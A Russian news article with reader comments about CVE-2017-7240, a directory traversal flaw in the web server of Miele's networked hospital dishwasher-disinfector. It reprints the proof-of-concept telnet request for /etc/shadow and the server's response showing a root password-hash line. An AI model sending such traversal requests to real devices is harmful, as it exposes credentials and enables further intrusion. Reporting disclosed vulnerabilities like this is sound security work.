Несколько посудомоечных машин-дезинфекторов Miele Professional PG 8528. Фото: Miele
В списке рассылки Seclists опубликована информация о необычной уязвимости CVE-2017-7240. Это уязвимость типа Directory Traversal в веб-сервере. Казалось бы, что такого странного? Подобные уязвимости находят сплошь и рядом. Но здесь речь идёт о веб-сервере… посудомоечной машины! В данном случае дыра найдена в промышленной посудомойке-дезинфекторе модели Miele Professional PG 8528 со встроенным Ethernet, веб-сервером и доступом в Интернет. Такие дезинфекторы применяют в больницах, научных лабораториях и т. д.
Подключение к Интернету необходимо посудомоечной машине для того, чтобы ею можно было управлять дистанционно. Управление осуществляется через встроенный веб-сервер под названием PST10 WebServer.
Как указано в описании уязвимости, встроенный веб-сервер прослушивает порт 80. Собственно, по этому порту происходит подключение и атака. Неаутентифицированный злоумышленник имеет возможность подключиться к посудомоечной машине и извлечь из веб-сервера пароли, которые могут быть полезны в последующих атаках.
Подключение к посудомойке по telnet осуществляется следующим образом:
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1Посудомоечная машина возвращает ответ:
HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52
root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::Как видно из ответа посудомойки, она возвращает файл /etc/shadow. Это файл с теневыми паролями. Там же записан и рутовый пароль.
Теневые (shadow) пароли призваны повысить безопасность в Unix-системах. Смысл в том, что зашифрованные пароли переносятся из стандартного файла /etc/passwd в /etc/shadow, который доступен только руту. Согласно формату файла паролей, в каждой строке записан ряд параметров. Это имя пользователя (в данном случае root), затем зашифрованный пароль ($1$$Md0i[...snip...]Z001), потом время последнего изменения пароля (10933), минимальное число дней до изменения пароля (0), максимальное число дней до изменения пароля (99999), число дней до первого предупреждения о смене пароля (7).
Хотя пароль зашифрован, но злоумышленник имеет возможность провести брутфорс по словарю с некоторыми шансами на успех.
Понятно, что обычному злоумышленнику доступ к посудомоечной машине ни к чему, это просто первый шаг на пути к дальнейшему освоению компьютерной сети жертвы, в том числе других устройств Интернета вещей. Пароль к посудомоечной машине может совпадать с паролями от других сервисов, так что с этого бытового прибора может начать разворачиваться крупная афера. Кроме того, злоумышленник может записать свой код для выполнения на веб-сервере.
Уязвимость обнаружил немецкий специалист по безопасности Йенс Регель (Jens Regel) из консалтинговой компании Schneider & Wulf EDV-Beratung GmbH & Co. KG. Он связался с представителем компании Miele 21 ноября 2016 года, а позже отправил всю информацию по багу. Затем он дважды пытался связаться, чтобы получить какой-то ответ, но ему не отвечали. Спустя более чем 4 месяца Йенс Регель выложил информацию в списке рассылки Seclists, то есть в открытом доступе.
Посудомоечные машины Miele Professional PG 8528 не предназначены для установки в домашних условиях, кафе, ресторанах или барах. В первую очередь это оборудование для больниц, где нужно не только мыть, но и дезинфицировать большое количество пробирок, тарелок и прочего оборудования. Уязвимости присвоен уровень опасности «средний». В самом деле, чем-то критически опасным потеря пароля от посудомоечной машины не грозит. Если бы машина была установлена в ресторане или кафе, то соседний ресторан мог бы умышленно запускать посудомойку на целую ночь, чтобы нанести конкуренту как можно больший экономический ущерб, раздув счета за электричество и воду. А какую атаку можно провести на дезинфектор в больнице? Сорвать процедуру дезинфекции в надежде на вирусную эпидемию?
По мере увеличения количества устройств Интернета вещей подобные уязвимости будут находить всё чаще. Когда производители бытовой техники ставят в неё веб-сервер, они очень редко задумываются о вопросах безопасности. Для них главное — удобство использования и маркетинг. Так и появляются холодильники с доступом в Интернет и тостеры с WiFi.
В Интернете вещей количество приборов теоретически может быть на порядок больше, чем в старом компьютерном Интернете. Это настоящее раздолье для создания гигантских ботнетов. Как мы помним, крупнейшая в прошлом году DDoS-атака была организована именно через устройства Интернета вещей — цифровые телеприставки и камеры видеонаблюдения сформировали ботнет Mirai.
Ботнет формировался с помощью червя. Он заражал уязвимые устройства с паролями по умолчанию. Сейчас к числу уязвимых устройств присоединились и посудомоечные машины. Неужели они тоже станут частью будущих ботнетов?
Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.
Комментарии (46)
space2pacman
28.03.2017 22:31+1Зачем вообще им ОС? не кажется ли это избыточным?
Welran
29.03.2017 07:57+8Удешевление из за стандартизации. Разрабатывать спец контроллер выйдет намного дороже.
avia07
28.03.2017 23:07Чтобы через встроенный микрофон прослушивать, а через встроенную камеру записывать видео. Big brother.
c_kotik
28.03.2017 23:11+5-Дорогой, ты помыл посуду?
-Нет, на нашей посудомоечной машине ядро компилируется.
-А мусор вынес?
…
Вот оно — светлое будущее и повсеместная автоматизация) /sarcasm
terek_ambrosovich
29.03.2017 07:44«Стиральная трагедия» Лема всё ближе и ближе.
AntonSor
29.03.2017 22:12— Его стиральная машина систематически рвала ему рубашки, своим посвистываньем создавала радиопомехи во всей округе, делала непристойные предложения старцам и малолетним, звонила по телефону различным лицам и, подражая голосу своего электродателя, просила в долг деньги, приглашала якобы для осмотра коллекции марок стиральные машины и полотерки соседей и растлевала их, а на досуге бродяжничала и побиралась.
---(с)
3aicheg
29.03.2017 08:13+4Ждём, когда начнут взламывать электронные унитазы. Зайдёшь облегчиться, а он отказывается поднять крышку и говорит, что сперва перечислите биткойны.
loly_girl
29.03.2017 09:03+2Не соглашусь относительно незначительной опасности этой уязвимости. Если отключить дробную тиндализацию (или вообще стерилизацию) то для антибиотикоустойчивых бактерий будет очень хорошо. Они и так в больницах кишат и прыгают. После массовой атаки жертв будет довольно много. Даже если удаётся заразившихся это гадостью пролечить, то финансовые потери очень большие: антибиотики из «последних рубежей» в тысячи раз дороже обычных.
AFakeman
29.03.2017 09:32А это вообще нормально веб-сервер от рута запускать?
DMGarikk
29.03.2017 10:14Разработчики вебинтерфейсов такой техники вообще с трудом понимают что это такое.
Помню было дело, разбирался с вебинтерфейсом дизельгенератора, некорректно сохранялись сетевые настройки… вендор предлагал поменять (перепаять) неисправный чип контроллера...(не, ну а в чём ещё может быть ошибка если один из 10 параметров (маска сети) не сохраняется после перезагрузки?)
dmitry_ch
29.03.2017 10:04Думаю, тема дырок в защите встроенных (в т.ч. и веб-) серверов в разной технике для Ализара составит нескончаемый источник
доходастатей — сейчас только что еще в пылесосе не встретишь веб-сервера… Хотя, не знаю, что там Самсунг с LG уже продают, они мастера на пустом месте бессмысленную функциональность встраивать, забыв сделать прочный корпус и надежные подшипники.
berezuev
29.03.2017 11:32> сейчас только что еще в пылесосе не встретишь веб-сервера
Ну, в роботах-пылесосах очень даже встретишь ))dmitry_ch
29.03.2017 11:44+1Но вот что те, кто делает, собственно, технику, вообще не понимают в сетевых делах, это точно проблема. Видел промышленное оборудование, которое в упор не хотело видеть собственный контрольный софт на соседнем (по сети) компьютере. Разбирательство показало, что мастер-наладчик оборудования, не поняв в настройке сети, для начала отключил IPv4 и IPv6 (залез во встроенную винду (!!!), и там «натыкал»), включил IPX, и еще, до кучи, снес под конец дайвер сетевухи. Винда, конечно, пыталась работать с «универсальным» драйвером сетевого адаптера, а контрольный софт пробовал ходить в сеть по IPX — и то, и другое без особого успеха, конечно.
Показательно, что мастеру-наладчику никто даже не сказал «идти учить матчасть». Он умеет настраивать оборудование, а что в сетях как ребенок, это его начальству (тоже, понятно, спецам по оборудованию, а не по сетям) проблемой не кажется. Как такие люди могут делать защищенную сетевую подсистему в своем оборудовании — загадка.
Причем, по сути, проблема безопасности становится проблемой производителя только при очень крупном скандале, ставшем известном другим заказчикам, или регулирующим органам. До того это проблема несчастного клиента, который себе поставил за кучу бабок промышленное железо, которое дыряво как решето.
iMisanthrope
29.03.2017 12:22Веб-сервер есть у лампочек Philips, у динамиков Philips Fidelio, робот-пылесос от Xiaomi слушает ssh-порт, даже настольная лампа стучится в сеть…
В итоге я весь этот зоопарк посадил в изолированную Wi-Fi сеть, без доступа во внешний мир)
dvserg
29.03.2017 12:27-1Теперь любая посудомойка сможет управлять ботнетом.
Sly_tom_cat
29.03.2017 16:23Блин, ну почему написано про зашифрованный пароль, если даже википедия знает что в /etc/shadow хранятся ХЕШИ от паролей.
И флаг вам в руки подбирать соленый хеш (сейчас это все чаще sha-512).
Но соглашусь — пускать под рутом веб-сервер — это глупейшая ошибка разработчиков прошивки. Уже простая замена пользователя закрыла бы доступ к /etc/shadowmayorovp
29.03.2017 16:58Соль защищает от радужных таблиц, а не от перебора.
Sly_tom_cat
29.03.2017 17:14А где я сказал что соль защищает от перебора?
Хотите подобрать — флаг вам в руки :)
ReSpown
29.03.2017 20:15-1Фраза «В веб-сервере посудомоечной машины» сломала мой мозг. БУГАГА. да и ещё в статье подробно написан эксплойт, то мой мозг сломан вдвойне )))
Ализар, он такой, умеет, может.
Lsh
30.03.2017 13:28Кстати, сейчас модная тема — мультиварки с удалённым управлением.
Типа по дороге домой подключился и разогрел себе кашу.
Интересно, как у них с безопасностью, находились ли какие дыры. Чтобы хакер Вася мог подключиться и спалить кашу к едрене-фене.
AntonSor
Дожили, посудомойка под линуксом!
AntonSor
Да ещё и с уязвимостями! Новый вид хакерской атаки — препятствование мытью посуды.
Garbus
Думаю отказ подобной машины в крупной больнице доставит немало хлопот. А если злоумышленник немного «поправит» ей алгоритм, сделав её работу неэффективной?
В результате, появление множества умных вещей не только радует, но и вызывает настороженность из за обилия уязвимостей в ПО.
jacob1237
В первую очередь это отличные зомби-машины. Для DDoS атак, например.
Garbus
Именно подобные — вряд ли. Скачки трафика мониторятся в локальной сети весьма неплохо, а представить эту штуку торчащей веб интерфейсом напрямую в интернет сложно. Разве что в совсем уж малых организациях при криворукости админов.
Для атак больше подходит что-то «домашнее», о своеволии которого простые пользователи в принципе не догадаются.
ultraElephant
Тот самый линукс для домохозяек.